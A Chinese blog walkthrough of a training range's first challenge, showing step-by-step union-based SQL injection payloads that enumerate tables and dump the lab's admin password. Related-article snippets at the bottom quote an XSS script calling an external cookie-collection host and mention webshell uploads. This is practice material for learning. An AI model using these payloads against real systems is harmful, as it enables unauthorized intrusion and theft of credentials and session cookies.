封神台靶场-第一章

最新推荐文章于 2023-09-17 16:33:09 发布
最新推荐文章于 2023-09-17 16:33:09 发布
阅读量2.7k 收藏 2
点赞数 4
分类专栏: 封神台 封神台-第一章 文章标签: 渗透测试靶场
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Mr_helloword/article/details/107295476
版权

第一章:为了女神小芳!

Tips:
通过sql注入拿到管理员密码!

  1. 寻找注入点,判断是什么注入
    |?id=1 and 1=1| 显示正常 |
    |-|–|
    | ?id=1and 1=2| 页面有变故(存在注入) |
    |?id=1’ | 页面有回显但是无法判断注入类型|
    |||在这里插入图片描述
    在这里插入图片描述

  2. 查看列数及字段数(这里通过二分法可以快速定位列数为2)
    在这里插入图片描述

  3. 联合查询(注意前面id为假才会执行后门的联合查询)
    |?id=121 union select 1,2 #| 查看回显位置 |
    |–|--|
    |?id=121 union select 1,database() #| 查看数据库 |
    |?id=121 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #| 查看表名 |
    |?id=112 union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=‘admin’ #| 查看字段名 |
    |?id=112 union select 1,(select group_concat(username,0x3a,password) from admin) #|查询字段值 |

回显位置:2
在这里插入图片描述
数据库名:maoshe
在这里插入图片描述
表名:admin,dir,new,xss(猜测表明为admin)
在这里插入图片描述
字段名:id,uesename,password
在这里插入图片描述
账号密码:admin:hellohack
在这里插入图片描述

Mr H
关注
  • 4
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
获取目标服务器c盘下flag文件信息,公开课基础演练靶场 第六章 webshell控制目标详细解题思路...
weixin_42442653的博客
08-06 1084
我看见第六章的传送门上写着大大的两个字--提权!!在上一章中,我已经通过上传一句话马,用菜刀连接了上传的这个文件,从而得到了后台的部分权限。但是我试过,现在拥有的权限,还不能打开c盘中的文件。而C盘中的文件往往都是比较重要的,因此,我需要提升自己的权限,如下图。进入传送门后,发现这一章的网站仍然是之前看到过的那个。而这个网站的管理员cookie已经被我拿到,并且已经成功上传一句话马至服务器了,如下...
神台第一章:为了女神小芳
qq_51459600的博客
12-22 503
实验平台:封神台-掌控安全在线演练靶场 第一章:为了女神小芳! 传送门:http://rhiq8003.ia.aqlab.cn/ 实验目标:获取admin的密码 点击查看新闻1,跳转到http://rhiq8003.ia.aqlab.cn/?id=1 发现传递的参数名为id   判断有无注入点 http://rhiq8003.ia.aqlab.cn/?id=1 and 1=2 未显示出新闻内容,说明存在注入点   判断查询字段数 http://rhiq8003.ia.aqlab.cn/
注入(一)
tomyyyyy
06-28 276
eg: 例子 第一步,判断是否存在sql注入漏洞 构造 ?id=1 and 1=1 ,回车 页面返回正常 构造 ?id=1 and 1=2 ,回车 页面不正常,初步判断这里 可能 存在一个注入漏洞 第二步:判断字段数 构造 ?id=1 and 1=1 order by 1 回车 页面正常 构造 ?id=1 and 1=1 order by 2 回车 页面正常 构造 ?id=1 and 1=1 o...
神台靶场SQL注入——SQLmap简单使用
m0_72592923的博客
01-13 1075
神台靶场SQL注入——SQLmap简单使用
【封神台 - 掌控安全靶场】尤里的复仇 Ⅰ 小芳!一二三四五六七章
热门推荐
algae
08-14 3万+
【封神台 - 掌控安全靶场】尤里的复仇 小芳!第五章:进击!拿到Web最高权限!【配套课时:绕过防护上传木马实战演练】(等级:15) <script src = https://xsspt.com/nxqPZY?1597410463> </ script> cookie : ASPSESSIONIDSQDARATQ=KJFAFKEDEAPPFBEDHJFCIGIC; flag=zkz{xsser-g00d},ADMINSESSIONIDCSTRCSDQ=LBMLMBCCNP
初识sqlmap学习笔记(封神台靶场第一题:为了女神小芳!)
qq_66013948的博客
09-17 190
在网页中,我们有的时候会在上方的可以输入url的地方进行输入,比如输入一个url,或者直接用其进行搜索。如果我们正常输入name的参数和密码,这就是一个正常的查询,不过我们把密码输错了,那就可能会导致查询不到数据,或者显示密码错误。这个时候,无论我们输入的密码是什么,这个数据库的查询都是正确的查询,因此,这会给黑客一个不用管理员密码就可以直接登录为管理员的一个方法,也就是专业人士口中的sql注入漏洞。可以看到admin是管理员,于是,管理员的密码也就是hellohack,那么,这道题的flag也就是这个。
登录别人的账户(仅在封神台靶场).mp4
04-07
这个教程仅在封神台靶场可用,如在其他网站使用,否则属于违法行为,后果自负,本教程仅做参考,真正攻破防火墙属于违法行为
神台-杂项8:奇怪的短信
最新发布
03-11
随波逐流工具,一个非常好用的解码工具
封神演义--------------------.pdf
03-27
封神演义
更改支付金额(仅在封神台靶场).mp4
04-07
这个教程仅在封神台靶场可用,如在其他网站使用,否则属于违法行为,后果自负,本教程仅做参考,真正攻破防火墙属于违法行为
mysql后台注入靶场源码.rar
04-21
该资源为存在漏洞的网站源码,学习web安全的小伙伴可以用来搭建环境做测试用 方法: 上传所有文件到空间根目录下,运行http://你的域名/install进行安装 安装过程遇到的数据库用户名和密码可以咨询空间你的空间商 不需要会员功能可以删除member目录 安装完成后更改admin目录为你的后台目录名,更改后的访问地址为 http://你的域名/修改的后台目录名 安装完成后请及时删除install目录
封神榜Feng.Shen.Bang.Fu.Mo.San.Tai.Zi
09-08
很好玩的nes游戏,很经典!是玩nes游戏必玩的一款游戏!
封神演义,-,第十二回,陈塘关哪吒出世.doc
09-16
封神演义,-,第十二回,陈塘关哪吒出世.doc
ZVuldrill 黑客靶场 附带安装教程
01-26
ZVuldrill是一款专为网络安全爱好者和专业渗透测试人员设计的黑客靶场平台,它提供了一系列精心设计的挑战,旨在帮助用户提升对常见网络漏洞的理解与应对能力。这个平台涵盖了多个关键的安全领域,包括SQL注入、XSS...
cocos2d-x封神榜demo源码
03-03
1. **初始化设置**:在`AppDelegate`类中,cocos2d-x引擎会被初始化,设置屏幕分辨率,加载资源,并创建第一个Scene。 2. **Scene的创建与切换**:`GameScene`或类似的类是游戏的主要逻辑承载者。开发者会在这些类...
神台靶场 第一章:为了女神小芳!writeup
Sk1y的博客
02-15 2万+
神台靶场 第一章:为了女神小芳! 题目简述: 封神台靶场,题目链接 解题过程: 首先是这样的url为: http://59.63.200.79:8003/ 当点击点击查看新闻时,相应的url变化,变为如下: http://59.63.200.79:8003/?id=1 ...
神台-靶场-第一章:为了女神小芳!(题解)+ 中北网安实训笔记-(20200701)-sql注入基本语法
tonyhapply的博客
07-18 1563
我们先来学习sql注入,
国内外黑客居然都在这些地方聚集
学习交流群:921427443
05-29 4733
1.track黑客导航 导航Track黑客导航 黑客导航,含有众多网安一行的官方网站及平台 无论你是老鸟还是萌新,都可以找得到对应适合的文章! 2.封神台靶场神台 - 掌控安全在线演练靶场,是一个在线黑客攻防演练平台。 在线练习靶场,是一个在线黑客攻防演练平台! 在成长的道路上怎么能缺少打怪刷级的乐趣呢! 但是市面上的网站漏洞组成复杂,而且会有法律风险,想要技术,封神台靶场是一个好的选择 3.黑客社区 Track 安全社区 - 掌控安全在线教育 Track_黑客_社区-追随黑客
神台基础关,第一关
weixin_44106116的博客
11-19 1737
1.判断是否存在SQL注入 点击新闻,看到了地址栏变化,产生了id传参 分别输入,and 1=1 和,and 1=2 显示页面不同,所以,存在sql注入 2.查询字段数,好用联合查询 order by 2 有显示,order by 3 无显示,可知此条语句字段数为2 在之后输入 and 1=2 union select 1,2 注销掉前方的查询语句,查看回显点, 新闻内容中显示了数字2 根据...
详细列举一个《封神演义》中以妲己为主的一个故事情节,不少于300字
06-01
在《封神演义》中,妲己是封神之战的主要反派人物之一,她被描 align-items: center; height: 100vh; } ``` 在这个例子中,我们定义了页面的样式,将页面元素居中显示。 7. 在 app.json 中配置两个页面: ```...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值